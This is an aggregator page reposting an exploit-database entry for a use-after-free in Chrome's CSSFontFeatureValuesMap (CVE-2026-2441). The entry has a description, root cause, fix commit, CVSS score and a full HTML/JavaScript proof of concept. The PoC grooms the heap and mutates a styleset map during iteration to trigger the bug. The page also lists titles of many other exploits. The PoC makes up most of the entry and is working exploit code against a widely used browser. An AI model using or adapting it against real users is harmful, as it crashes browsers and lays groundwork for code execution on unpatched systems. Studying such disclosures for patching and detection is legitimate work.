惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
WordPress大学
WordPress大学
云风的 BLOG
云风的 BLOG
Stack Overflow Blog
Stack Overflow Blog
MongoDB | Blog
MongoDB | Blog
腾讯CDC
V
V2EX
Martin Fowler
Martin Fowler
A
About on SuperTechFans
大猫的无限游戏
大猫的无限游戏
Blog — PlanetScale
Blog — PlanetScale
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
酷 壳 – CoolShell
酷 壳 – CoolShell
C
Check Point Blog
博客园 - 【当耐特】
Cisco Talos Blog
Cisco Talos Blog
The Hacker News
The Hacker News
K
Kaspersky official blog
Security Latest
Security Latest
H
Help Net Security
博客园_首页
美团技术团队
Spread Privacy
Spread Privacy
博客园 - 司徒正美
Hugging Face - Blog
Hugging Face - Blog
S
SegmentFault 最新的问题
G
Google Developers Blog
NISL@THU
NISL@THU
爱范儿
爱范儿
I
Intezer
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
阮一峰的网络日志
阮一峰的网络日志
N
News and Events Feed by Topic
P
Privacy International News Feed
Application and Cybersecurity Blog
Application and Cybersecurity Blog
S
Security @ Cisco Blogs
Schneier on Security
Schneier on Security
雷峰网
雷峰网
人人都是产品经理
人人都是产品经理
V
Vulnerabilities – Threatpost
W
WeLiveSecurity
P
Palo Alto Networks Blog
G
GRAHAM CLULEY
Hacker News: Ask HN
Hacker News: Ask HN
I
InfoQ
The Cloudflare Blog
F
Full Disclosure
SecWiki News
SecWiki News
宝玉的分享
宝玉的分享
N
Netflix TechBlog - Medium

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free
2026-02-23 · via The Exploit Database - CXSecurity.com

Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free

# Exploit Title: Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free # Date: 2026-02-23 # Exploit Author: nu11secur1ty # Vendor Homepage: https://www.google.com/chrome/ # Software Link: https://www.google.com/chrome/ # Version: Chrome <= 144.x | Chrome < 145.0.7632.75 # Tested on: Windows 11 / Linux / macOS # CVE: CVE-2026-2441 # Exploit Repository: https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-2441 ## Description A use-after-free vulnerability exists in Google Chrome's CSS engine (Blink) within the CSSFontFeatureValuesMap implementation. When an iterator is created over a CSSFontFeatureValuesMap object and the underlying HashMap is mutated during iteration, a rehash operation occurs, freeing the original memory while the iterator still holds a raw pointer to it. This leads to a use-after-free condition that can be exploited to execute arbitrary code inside the Chrome sandbox. The vulnerability was actively exploited in the wild as a zero-day before the patch was released. ## Vulnerable Versions - Google Chrome <= 144.x - Google Chrome < 145.0.7632.75 - Microsoft Edge (prior to Chromium 145 update) - Opera (prior to 127.0.5778.64) - Any Chromium-based browser using affected Blink versions ## Technical Details **Root Cause:** In `third_party/blink/renderer/core/css/css_font_feature_values_map.cc`, the `FontFeatureValuesMapIterationSource` holds a raw pointer (`const FontFeatureAliases* aliases_`) to the internal HashMap. When the map is mutated via `set()` or `delete()` during iteration, the HashMap rehashes, the old storage is freed, and the pointer becomes dangling. **Fix:** Commit `63f3cb4864c64c677cd60c76c8cb49d37d08319c` replaces the raw pointer with a deep copy (`const FontFeatureAliases aliases_`). ## CVSS Score **8.8 (High)** - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ## Proof of Concept ```html <!DOCTYPE html> <!-- CVE-2026-2441 - CSSFontFeatureValuesMap UAF Author: nu11secur1ty Date: 2026-02-23 Repository: --> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="author" content="nu11secur1ty"> <title>CVE-2026-2441 PoC - nu11secur1ty</title> <style id="target-style"> @font-feature-values Target { @styleset { a:1; b:2; c:3; d:4; e:5; f:6; g:7; h:8; i:9; j:10; k:11; l:12; m:13; n:14; o:15; } } </style> <style id="groom-style"></style> </head> <body> <h2>CVE-2026-2441 Proof of Concept</h2> <p>Author: nu11secur1ty</p> <p>Check browser console for output. If browser crashes -> VULNERABLE</p> <script> // ================================================================= // CVE-2026-2441 Use-After-Free Exploit // Author: nu11secur1ty // ================================================================= console.log("=========================================="); console.log("CVE-2026-2441 PoC - nu11secur1ty"); console.log("=========================================="); // Heap grooming - create stable heap state function groomHeap(count) { let style = document.getElementById('groom-style'); if (!style || !style.sheet) return []; // Clear existing while (style.sheet.cssRules.length) { try { style.sheet.deleteRule(0); } catch(e) {} } // Create groom objects for (let i = 0; i < count; i++) { try { style.sheet.insertRule( `@font-feature-values Groom${i} { @styleset { v${i}: ${i}; } }`, style.sheet.cssRules.length ); } catch(e) {} } console.log("[+] Heap groomed with " + count + " objects"); return Array(count); } // Main exploit logic try { // Phase 1: Prepare heap groomHeap(64); // Phase 2: Get target map let sheet = document.getElementById('target-style').sheet; if (!sheet || !sheet.cssRules.length) { throw new Error("Target CSS rule not found"); } let rule = sheet.cssRules[0]; let map = rule.styleset; console.log("[+] CSSFontFeatureValuesMap size: " + map.size); // Phase 3: Create iterator - RAW POINTER CAPTURED HERE console.log("[*] Creating iterator (raw pointer captured)"); let iterator = map.entries(); let step = 0; let iterations = 0; // Phase 4: Trigger UAF through mutation + rehash console.log("[*] Triggering rehash + UAF..."); while (step < 10) { let result = iterator.next(); if (result.done) break; let [key, value] = result.value; iterations++; console.log(" [step " + step + "] Read: " + key + " = " + value); // MUTATION: delete current key map.delete(key); // MUTATION: massive insert to force rehash for (let i = 0; i < 512; i++) { map.set("spray_" + step + "_" + i, [i, i+1, i+2]); } step++; } console.log("[*] Completed " + iterations + " iterations"); // Phase 5: Final check console.log("[*] Exploit execution complete"); console.log("[*] If browser crashed: VULNERABLE"); console.log("[*] If page survived: PATCHED"); console.log("=========================================="); console.log("CVE-2026-2441 - nu11secur1ty"); console.log("Repository: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-2441"); console.log("=========================================="); } catch (e) { console.log("[!] EXCEPTION: " + e.message); console.log("[!] This indicates UAF was triggered"); console.log("[!] CVE-2026-2441 - nu11secur1ty"); } // Force layout recalc as additional trigger void document.body.offsetWidth; </script> <!-- Alternative for...of trigger --> <script> try { let altStyle = document.createElement('style'); document.head.appendChild(altStyle); altStyle.sheet.insertRule( '@font-feature-values Alt{@styleset{x:1; y:2; z:3;}}', 0 ); let altMap = altStyle.sheet.cssRules[0].styleset; for (let [k, v] of altMap) { altMap.delete(k); for (let i = 0; i < 256; i++) { altMap.set("alt_" + i, [i]); } break; } } catch(e) { console.log("[!] Alternative trigger exception: " + e.message); } </script> </body> </html> # Demo: [href](https://www.patreon.com/posts/cve-2026-2441-151454779)



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2026, cxsecurity.com

Back to Top